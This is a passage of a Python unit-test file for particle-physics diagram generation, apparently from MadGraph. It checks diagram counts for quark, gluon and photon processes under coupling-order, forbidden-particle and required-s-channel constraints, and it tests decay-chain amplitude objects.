self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_ndiags22[ngluons])
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'orders': {'QED':0, 'QCD':4}})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_ndiags04[ngluons])
def test_squared_orders_constraints_uux_ddxuux(self):
""" Tests that the various possible squared order constraints are
correctly treated at LO."""
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':2,'state':False}))
myleglist.append(base_objects.Leg({'id':-2,'state':False}))
myleglist.append(base_objects.Leg({'id':1,'state':True}))
myleglist.append(base_objects.Leg({'id':-1,'state':True}))
myleglist.append(base_objects.Leg({'id':2,'state':True}))
myleglist.append(base_objects.Leg({'id':-2,'state':True}))
SO_tests = [({},{},{},50),
({},{'QED':-1},{'QED':'=='},14),
({},{'QED':-2},{'QED':'=='},38),
({},{'QED':-3},{'QED':'=='},50),
({},{'QED':-4},{'QED':'=='},36),
({},{'QED':-5},{'QED':'=='},12),
({},{'QED':-6},{'QED':'=='},0),
({},{'QCD':4},{'QCD':'>'},38),
({},{'QCD':2},{'QCD':'<='},36),
({},{'QED':2,'QCD':4},{'QED':'==','QCD':'>'},38),
({'QCD':2},{'QED':4,'QCD':4},{'QED':'<=','QCD':'<='},24)]
for orders, sq_orders, sq_orders_type, ndiagGoal in SO_tests:
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'orders': orders,
'squared_orders': sq_orders,
'sqorders_types':sq_orders_type})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),ndiagGoal)
def test_forbidden_particles_uux_uuxng(self):
"""Test the number of diagrams uu~>uu~+g with different
forbidden particles.
"""
goal_no_photon = [2, 10]
goal_no_photon_quark = [2, 2]
for ngluons in range(2):
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':-1,
'state':True}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
myleglist.extend([base_objects.Leg({'id':21,
'state':True})] * ngluons)
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'forbidden_particles':[22]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_no_photon[ngluons])
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'forbidden_particles':[22, 1]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_no_photon_quark[ngluons])
def test_forbidden_onshell_s_channel_uux_uuxng(self):
"""Test diagram generation with forbidden onshell s-channel particles.
"""
goal_no_photon = [4, 18]
photon_none = [{1:[0]},{2:[0],4:[0],13:[1],17:[1]}]
goal_no_quark = [2, 6]
quark_none = [{0:[0]},{0:[0,1],1:[0,1],3:[1],5:[1]}]
goal_no_antiquark = [2, 6]
antiquark_none = [{},{}]
for ngluons in range(2):
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':-1,
'state':True}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
myleglist.extend([base_objects.Leg({'id':21,
'state':True})] * ngluons)
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'forbidden_onsh_s_channels':[22]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_no_photon[ngluons])
#print self.myamplitude.nice_string()
diagrams = self.myamplitude.get('diagrams')
for idiag in range(len(diagrams)):
if idiag in photon_none[ngluons]:
vertices = diagrams[idiag].get('vertices')
for ivert in range(len(vertices)):
if ivert in photon_none[ngluons][idiag]:
self.assertEqual(False,
vertices[ivert].get('legs')[-1].get('onshell'))
else:
self.assertEqual(None,
vertices[ivert].get('legs')[-1].get('onshell'))
else:
self.assertFalse(any([vert.get('legs')[-1].get('onshell') == False\
for vert in diagrams[idiag].get('vertices')]))
# Test with u a > u a (+ g)
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':22,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
myleglist.append(base_objects.Leg({'id':22,
'state':True}))
myleglist.extend([base_objects.Leg({'id':21,
'state':True})] * ngluons)
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'forbidden_onsh_s_channels':[1]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_no_quark[ngluons])
#print self.myamplitude.nice_string()
diagrams = self.myamplitude.get('diagrams')
for idiag in range(len(diagrams)):
if idiag in quark_none[ngluons]:
vertices = diagrams[idiag].get('vertices')
for ivert in range(len(vertices)):
if ivert in quark_none[ngluons][idiag]:
self.assertEqual(False,
vertices[ivert].get('legs')[-1].get('onshell'))
else:
self.assertEqual(None,
vertices[ivert].get('legs')[-1].get('onshell'))
else:
self.assertFalse(any([vert.get('legs')[-1].get('onshell') == False\
for vert in diagrams[idiag].get('vertices')]))
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'forbidden_onsh_s_channels':[-1]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_no_antiquark[ngluons])
diagrams = self.myamplitude.get('diagrams')
for idiag in range(len(diagrams)):
if idiag in antiquark_none[ngluons]:
vertices = diagrams[idiag].get('vertices')
for ivert in range(len(vertices)):
if ivert in antiquark_none[ngluons][idiag]:
self.assertEqual(False,
vertices[ivert].get('legs')[-1].get('onshell'))
else:
self.assertEqual(None,
vertices[ivert].get('legs')[-1].get('onshell'))
else:
self.assertFalse(any([vert.get('legs')[-1].get('onshell') == False\
for vert in diagrams[idiag].get('vertices')]))
def test_forbidden_s_channel_uux_uuxng(self):
"""Test diagram generation with forbidden s-channel particles.
"""
goal_no_photon = [3, 14]
goal_no_quark = [1, 2]
goal_no_antiquark = [2, 6]
for ngluons in range(2):
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':-1,
'state':True}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
myleglist.extend([base_objects.Leg({'id':21,
'state':True})] * ngluons)
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'forbidden_s_channels':[22]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_no_photon[ngluons])
# Test with u a > u a (+ g)
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':22,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
myleglist.append(base_objects.Leg({'id':22,
'state':True}))
myleglist.extend([base_objects.Leg({'id':21,
'state':True})] * ngluons)
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'forbidden_s_channels':[1]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_no_quark[ngluons])
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'forbidden_s_channels':[-1]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_no_antiquark[ngluons])
def test_required_s_channel_uux_uuxng(self):
"""Test the number of diagrams uu~>uu~+g with different
required s-channel particles.
"""
goal_req_photon = [1, 4]
goal_req_quark = [1, 4]
goal_req_photon_or_gluon = [2, 9]
goal_req_antiquark = [0, 0]
for ngluons in range(2):
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':-1,
'state':True}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
myleglist.extend([base_objects.Leg({'id':21,
'state':True})] * ngluons)
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'required_s_channels':[[22]]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_req_photon[ngluons])
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'required_s_channels':[[21], [22]]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_req_photon_or_gluon[ngluons])
# Just to make sure that diagrams are not double counted
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'required_s_channels':[[22], [22]]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_req_photon[ngluons])
# Test with u a > u a (+ g)
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':22,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
myleglist.append(base_objects.Leg({'id':22,
'state':True}))
myleglist.extend([base_objects.Leg({'id':21,
'state':True})] * ngluons)
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'required_s_channels':[[1]]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_req_quark[ngluons])
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'required_s_channels':[[-1]]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_req_antiquark[ngluons])
def test_required_s_channel_decay(self):
"""Test decay processes d > d u u~ + a with required s-channels.
"""
goal_req_photon = [1, 4]
goal_req_d = [0, 2]
goal_req_u = [0, 1]
goal_req_u_or_d = [0, 3]
goal_req_antid = [0, 0]
for nphotons in range(2):
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
myleglist.append(base_objects.Leg({'id':2,
'state':True}))
myleglist.append(base_objects.Leg({'id':-2,
'state':True}))
myleglist.extend([base_objects.Leg({'id':22,
'state':True})] * nphotons)
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'required_s_channels':[[22]]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_req_photon[nphotons])
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'required_s_channels':[[21]]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_req_photon[nphotons])
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'required_s_channels':[[1, 22]]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_req_d[nphotons])
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'required_s_channels':[[2, 22]]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_req_u[nphotons])
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'required_s_channels':[[1, 22],
[2, 22]]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_req_u_or_d[nphotons])
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'required_s_channels':[[-1]]})
self.myamplitude.set('process', myproc)
self.myamplitude.generate_diagrams()
self.assertEqual(len(self.myamplitude.get('diagrams')),
goal_req_antid[nphotons])
def test_decay_process_generation(self):
"""Test the decay process generations d > d g g and d > g g d
"""
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myproc1 = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'is_decay_chain': True})
myamplitude1 = diagram_generation.Amplitude()
myamplitude1.set('process', myproc1)
myamplitude1.generate_diagrams()
self.assertEqual(len(myamplitude1.get('diagrams')), 3)
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
myproc2 = base_objects.Process({'legs':myleglist,
'model':self.mymodel,
'is_decay_chain': True})
myamplitude2 = diagram_generation.Amplitude()
myamplitude2.set('process', myproc2)
myamplitude2.generate_diagrams()
self.assertEqual(len(myamplitude2.get('diagrams')), 3)
def test_diagram_generation_identical_interactions(self):
"""Test generation with multiple interactions for same particles
"""
mypartlist = base_objects.ParticleList();
myinterlist = base_objects.InteractionList();
# A gluon
mypartlist.append(base_objects.Particle({'name':'g',
'antiname':'g',
'spin':3,
'color':8,
'mass':'zero',
'width':'zero',
'texname':'g',
'antitexname':'g',
'line':'curly',
'charge':0.,
'pdg_code':21,
'propagating':True,
'is_part':True,
'self_antipart':True}))
g = mypartlist[-1]
# A quark U and its antiparticle
mypartlist.append(base_objects.Particle({'name':'u',
'antiname':'u~',
'spin':2,
'color':3,
'mass':'zero',
'width':'zero',
'texname':'u',
'antitexname':'\bar u',
'line':'straight',
'charge':2. / 3.,
'pdg_code':2,
'propagating':True,
'is_part':True,
'self_antipart':False}))
u = mypartlist[-1]
antiu = copy.copy(u)
antiu.set('is_part', False)
# A quark D and its antiparticle
mypartlist.append(base_objects.Particle({'name':'d',
'antiname':'d~',
'spin':2,
'color':3,
'mass':'zero',
'width':'zero',
'texname':'d',
'antitexname':'\bar d',
'line':'straight',
'charge':-1. / 3.,
'pdg_code':1,
'propagating':True,
'is_part':True,
'self_antipart':False}))
d = mypartlist[-1]
antid = copy.copy(d)
antid.set('is_part', False)
# Gluon couplings to quarks
myinterlist.append(base_objects.Interaction({
'id': 1,
'particles': base_objects.ParticleList(\
[antiu, \
u, \
g]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GUU'},
'orders':{'QCD':1}}))
myinterlist.append(base_objects.Interaction({
'id': 2,
'particles': base_objects.ParticleList(\
[antid, \
d, \
g]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GDD'},
'orders':{'QCD':1}}))
myinterlist.append(base_objects.Interaction({
'id': 3,
'particles': base_objects.ParticleList(\
[antid, \
d, \
g]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GNP'},
'orders':{'NP':1}}))
mymodel = base_objects.Model()
mymodel.set('particles', mypartlist)
mymodel.set('interactions', myinterlist)
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-2,
'state':False}))
myleglist.append(base_objects.Leg({'id':2,
'state':False}))
myleglist.append(base_objects.Leg({'id':-1,
'state':True}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
myproc = base_objects.Process({'legs':myleglist,
'model':mymodel})
myamplitude = diagram_generation.Amplitude(myproc)
myamplitude.generate_diagrams()
diagrams = myamplitude.get('diagrams')
self.assertEqual(len(diagrams), 2)
self.assertEqual(diagrams[0].get('orders'),{'QCD':2, 'NP':0, 'WEIGHTED':2})
self.assertEqual(diagrams[1].get('orders'),{'QCD':1, 'NP':1, 'WEIGHTED':2})
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myproc = base_objects.Process({'legs':myleglist,
'model':mymodel})
myamplitude = diagram_generation.Amplitude(myproc)
myamplitude.generate_diagrams()
diagrams = myamplitude.get('diagrams')
self.assertEqual(len(diagrams), 12)
orders = [{'QCD':3, 'NP':0, 'WEIGHTED':3},
{'QCD':2, 'NP':1, 'WEIGHTED':3},
{'QCD':2, 'NP':1, 'WEIGHTED':3},
{'QCD':1, 'NP':2, 'WEIGHTED':3},
{'QCD':3, 'NP':0, 'WEIGHTED':3},
{'QCD':2, 'NP':1, 'WEIGHTED':3},
{'QCD':2, 'NP':1, 'WEIGHTED':3},
{'QCD':1, 'NP':2, 'WEIGHTED':3},
{'QCD':3, 'NP':0, 'WEIGHTED':3},
{'QCD':2, 'NP':1, 'WEIGHTED':3},
{'QCD':3, 'NP':0, 'WEIGHTED':3},
{'QCD':2, 'NP':1, 'WEIGHTED':3}]
for diagram, order in zip(diagrams, orders):
self.assertEqual(diagram.get('orders'),order)
def test_multiple_interaction_identical_particles(self):
"""Test the case with multiple interactions for identical particles
"""
mypartlist = base_objects.ParticleList();
myinterlist = base_objects.InteractionList();
# A quark U and its antiparticle
mypartlist.append(base_objects.Particle({'name':'u',
'antiname':'u~',
'spin':2,
'color':3,
'mass':'zero',
'width':'zero',
'texname':'u',
'antitexname':'\bar u',
'line':'straight',
'charge':2. / 3.,
'pdg_code':2,
'propagating':True,
'is_part':True,
'self_antipart':False}))
u = mypartlist[-1]
antiu = copy.copy(u)
antiu.set('is_part', False)
# A gluon
mypartlist.append(base_objects.Particle({'name':'g',
'antiname':'g',
'spin':3,
'color':8,
'mass':'zero',
'width':'zero',
'texname':'g',
'antitexname':'g',
'line':'curly',
'charge':0.,
'pdg_code':21,
'propagating':True,
'is_part':True,
'self_antipart':True}))
g = mypartlist[-1]
# two different couplings u u g
myinterlist.append(base_objects.Interaction({
'id': 1,
'particles': base_objects.ParticleList(\
[antiu, \
u, \
g]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQCD'},
'orders':{'QCD':1}}))
myinterlist.append(base_objects.Interaction({
'id': 2,
'particles': base_objects.ParticleList(\
[antiu, \
u, \
g]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GEFF'},
'orders':{'EFF':1}}))
# 3 gluon vertex
self.myinterlist.append(base_objects.Interaction({
'id': 1,
'particles': base_objects.ParticleList(\
[self.mypartlist[0]] * 3),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'G'},
'orders':{'QCD':1}}))
mymodel = base_objects.Model()
mymodel.set('particles', mypartlist)
mymodel.set('interactions', myinterlist)
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':21,
'state':False}))
myleglist.append(base_objects.Leg({'id':21,
'state':False}))
myleglist.append(base_objects.Leg({'id':2,
'state':True}))
myleglist.append(base_objects.Leg({'id':-2,
'state':True}))
myproc = base_objects.Process({'legs':myleglist,
'model':mymodel})
myamplitude = diagram_generation.Amplitude()
myamplitude.set('process', myproc)
self.assertEqual(len(myamplitude.get('diagrams')), 8)
goal_lastvx = set([21,2,-2])
for diag in myamplitude.get('diagrams'):
self.assertEqual(set([l.get('id') for l in \
diag.get('vertices')[-1].get('legs')]),
goal_lastvx)
#===============================================================================
# Muliparticle test
#===============================================================================
class MultiparticleTest(unittest.TestCase):
"""Test class for processes with multiparticle labels"""
mypartlist = base_objects.ParticleList()
myinterlist = base_objects.InteractionList()
mymodel = base_objects.Model()
myprocess = base_objects.Process()
def setUp(self):
# A gluon
self.mypartlist.append(base_objects.Particle({'name':'g',
'antiname':'g',
'spin':3,
'color':8,
'mass':'zero',
'width':'zero',
'texname':'g',
'antitexname':'g',
'line':'curly',
'charge':0.,
'pdg_code':21,
'propagating':True,
'is_part':True,
'self_antipart':True}))
# A quark U and its antiparticle
self.mypartlist.append(base_objects.Particle({'name':'u',
'antiname':'u~',
'spin':2,
'color':3,
'mass':'zero',
'width':'zero',
'texname':'u',
'antitexname':'\bar u',
'line':'straight',
'charge':2. / 3.,
'pdg_code':2,
'propagating':True,
'is_part':True,
'self_antipart':False}))
antiu = copy.copy(self.mypartlist[1])
antiu.set('is_part', False)
# A quark D and its antiparticle
self.mypartlist.append(base_objects.Particle({'name':'d',
'antiname':'d~',
'spin':2,
'color':3,
'mass':'zero',
'width':'zero',
'texname':'d',
'antitexname':'\bar d',
'line':'straight',
'charge':-1. / 3.,
'pdg_code':1,
'propagating':True,
'is_part':True,
'self_antipart':False}))
antid = copy.copy(self.mypartlist[2])
antid.set('is_part', False)
# A photon
self.mypartlist.append(base_objects.Particle({'name':'a',
'antiname':'a',
'spin':3,
'color':1,
'mass':'zero',
'width':'zero',
'texname':'\gamma',
'antitexname':'\gamma',
'line':'wavy',
'charge':0.,
'pdg_code':22,
'propagating':True,
'is_part':True,
'self_antipart':True}))
# A electron and positron
self.mypartlist.append(base_objects.Particle({'name':'e+',
'antiname':'e-',
'spin':2,
'color':1,
'mass':'zero',
'width':'zero',
'texname':'e^+',
'antitexname':'e^-',
'line':'straight',
'charge':-1.,
'pdg_code':11,
'propagating':True,
'is_part':True,
'self_antipart':False}))
antie = copy.copy(self.mypartlist[4])
antie.set('is_part', False)
# 3 gluon vertiex
self.myinterlist.append(base_objects.Interaction({
'id': 1,
'particles': base_objects.ParticleList(\
[self.mypartlist[0]] * 3),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'G'},
'orders':{'QCD':1}}))
# 4 gluon vertex
self.myinterlist.append(base_objects.Interaction({
'id': 2,
'particles': base_objects.ParticleList(\
[self.mypartlist[0]] * 4),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'G^2'},
'orders':{'QCD':2}}))
# Gluon and photon couplings to quarks
self.myinterlist.append(base_objects.Interaction({
'id': 3,
'particles': base_objects.ParticleList(\
[self.mypartlist[1], \
antiu, \
self.mypartlist[0]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQQ'},
'orders':{'QCD':1}}))
self.myinterlist.append(base_objects.Interaction({
'id': 4,
'particles': base_objects.ParticleList(\
[self.mypartlist[1], \
antiu, \
self.mypartlist[3]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
self.myinterlist.append(base_objects.Interaction({
'id': 5,
'particles': base_objects.ParticleList(\
[self.mypartlist[2], \
antid, \
self.mypartlist[0]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQQ'},
'orders':{'QCD':1}}))
self.myinterlist.append(base_objects.Interaction({
'id': 6,
'particles': base_objects.ParticleList(\
[self.mypartlist[2], \
antid, \
self.mypartlist[3]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
# Coupling of e to gamma
self.myinterlist.append(base_objects.Interaction({
'id': 7,
'particles': base_objects.ParticleList(\
[self.mypartlist[4], \
antie, \
self.mypartlist[3]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
self.mymodel.set('particles', self.mypartlist)
self.mymodel.set('interactions', self.myinterlist)
#===============================================================================
# DecayChainAmplitudeTest
#===============================================================================
class DecayChainAmplitudeTest(unittest.TestCase):
"""Test class for the DecayChainAmplitude object"""
mydict = {}
mymodel = base_objects.Model()
my_amplitudes = diagram_generation.AmplitudeList()
my_decay_chains = diagram_generation.DecayChainAmplitudeList()
my_decay_chain = diagram_generation.DecayChainAmplitude()
def setUp(self):
mypartlist = base_objects.ParticleList()
myinterlist = base_objects.InteractionList()
# A gluon
mypartlist.append(base_objects.Particle({'name':'g',
'antiname':'g',
'spin':3,
'color':8,
'mass':'zero',
'width':'zero',
'texname':'g',
'antitexname':'g',
'line':'curly',
'charge':0.,
'pdg_code':21,
'propagating':True,
'is_part':True,
'self_antipart':True}))
# A quark U and its antiparticle
mypartlist.append(base_objects.Particle({'name':'u',
'antiname':'u~',
'spin':2,
'color':3,
'mass':'zero',
'width':'zero',
'texname':'u',
'antitexname':'\bar u',
'line':'straight',
'charge':2. / 3.,
'pdg_code':2,
'propagating':True,
'is_part':True,
'self_antipart':False}))
antiu = copy.copy(mypartlist[1])
antiu.set('is_part', False)
# A quark D and its antiparticle
mypartlist.append(base_objects.Particle({'name':'d',
'antiname':'d~',
'spin':2,
'color':3,
'mass':'zero',
'width':'zero',
'texname':'d',
'antitexname':'\bar d',
'line':'straight',
'charge':-1. / 3.,
'pdg_code':1,
'propagating':True,
'is_part':True,
'self_antipart':False}))
antid = copy.copy(mypartlist[2])
antid.set('is_part', False)
# A photon
mypartlist.append(base_objects.Particle({'name':'a',
'antiname':'a',
'spin':3,
'color':1,
'mass':'zero',
'width':'zero',
'texname':'\gamma',
'antitexname':'\gamma',
'line':'wavy',
'charge':0.,
'pdg_code':22,
'propagating':True,
'is_part':True,
'self_antipart':True}))
# A electron and positron
mypartlist.append(base_objects.Particle({'name':'e+',
'antiname':'e-',
'spin':2,
'color':1,
'mass':'zero',
'width':'zero',
'texname':'e^+',
'antitexname':'e^-',
'line':'straight',
'charge':-1.,
'pdg_code':11,
'propagating':True,
'is_part':True,
'self_antipart':False}))
antie = copy.copy(mypartlist[4])
antie.set('is_part', False)
# 3 gluon vertiex
myinterlist.append(base_objects.Interaction({
'id': 1,
'particles': base_objects.ParticleList(\
[mypartlist[0]] * 3),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'G'},
'orders':{'QCD':1}}))
# 4 gluon vertex
myinterlist.append(base_objects.Interaction({
'id': 2,
'particles': base_objects.ParticleList(\
[mypartlist[0]] * 4),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'G^2'},
'orders':{'QCD':2}}))
# Gluon and photon couplings to quarks
myinterlist.append(base_objects.Interaction({
'id': 3,
'particles': base_objects.ParticleList(\
[mypartlist[1], \
antiu, \
mypartlist[0]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQQ'},
'orders':{'QCD':1}}))
myinterlist.append(base_objects.Interaction({
'id': 4,
'particles': base_objects.ParticleList(\
[mypartlist[1], \
antiu, \
mypartlist[3]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
myinterlist.append(base_objects.Interaction({
'id': 5,
'particles': base_objects.ParticleList(\
[mypartlist[2], \
antid, \
mypartlist[0]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQQ'},
'orders':{'QCD':1}}))
myinterlist.append(base_objects.Interaction({
'id': 6,
'particles': base_objects.ParticleList(\
[mypartlist[2], \
antid, \
mypartlist[3]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
# Coupling of e to gamma
myinterlist.append(base_objects.Interaction({
'id': 7,
'particles': base_objects.ParticleList(\
[mypartlist[4], \
antie, \
mypartlist[3]]),
'color': [],
'lorentz':['L1'],
'couplings':{(0, 0):'GQED'},
'orders':{'QED':1}}))
self.mymodel.set('particles', mypartlist)
self.mymodel.set('interactions', myinterlist)
self.mydict = {'amplitudes': self.my_amplitudes,
'decay_chains': self.my_decay_chains}
self.my_decay_chain = diagram_generation.DecayChainAmplitude(\
self.mydict)
def test_setget_process_correct(self):
"Test correct DecayChainAmplitude object __init__, get and set"
myprocess2 = diagram_generation.DecayChainAmplitude()
for prop in self.mydict.keys():
myprocess2.set(prop, self.mydict[prop])
self.assertEqual(self.my_decay_chain, myprocess2)
def test_setget_process_exceptions(self):
"Test error raising in DecayChainAmplitude __init__, get and set"
wrong_dict = self.mydict
wrong_dict['wrongparam'] = 'wrongvalue'
a_number = 0
# Test init
self.assertRaises(diagram_generation.DecayChainAmplitude.PhysicsObjectError,
diagram_generation.DecayChainAmplitude,
wrong_dict)
self.assertRaises(AssertionError,
diagram_generation.DecayChainAmplitude,
a_number)
# Test get
self.assertRaises(AssertionError,
self.my_decay_chain.get,
a_number)
self.assertRaises(diagram_generation.DecayChainAmplitude.PhysicsObjectError,
self.my_decay_chain.get,
'wrongparam')
# Test set
self.assertRaises(AssertionError,
self.my_decay_chain.set,
a_number, 0)
self.assertRaises(diagram_generation.DecayChainAmplitude.PhysicsObjectError,
self.my_decay_chain.set,
'wrongparam', 0)
def test_representation(self):
"""Test process object string representation."""
goal = "{\n"
goal = goal + " \'amplitudes\': %s,\n" % repr(diagram_generation.AmplitudeList())
goal = goal + " \'decay_chains\': %s\n}" % repr(diagram_generation.AmplitudeList())
self.assertEqual(goal, str(self.my_decay_chain))
def test_decay_chain_pp_jj(self):
"""Test a decay chain process pp > jj, j > jj based on
multiparticle lists
"""
p = [1, -1, 2, -2, 21]
my_multi_leg = base_objects.MultiLeg({'ids': p, 'state': True});
# Define the multiprocess
my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * 4])
my_multi_leglist[0].set('state', False)
my_multi_leglist[1].set('state', False)
my_process_definition = base_objects.ProcessDefinition({'legs':my_multi_leglist,
'model':self.mymodel})
my_decay_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * 4])
my_decay_leglist[0].set('state', False)
my_decay_processes = base_objects.ProcessDefinition({\
'legs':my_decay_leglist,
'model':self.mymodel})
my_process_definition.set('decay_chains',
base_objects.ProcessDefinitionList(\
[my_decay_processes]))
my_decay_chain_amps = diagram_generation.DecayChainAmplitude(\
my_process_definition)
self.assertEqual(len(my_decay_chain_amps.get('amplitudes')), 35)
self.assertEqual(len(my_decay_chain_amps.get('decay_chains')), 1)
self.assertEqual(len(my_decay_chain_amps.get('decay_chains')[0].\
get('amplitudes')), 15)
# Check that all onshell flags are set appropriately
for amp in my_decay_chain_amps.get('amplitudes'):
for diagram in amp.get('diagrams'):
external = set()
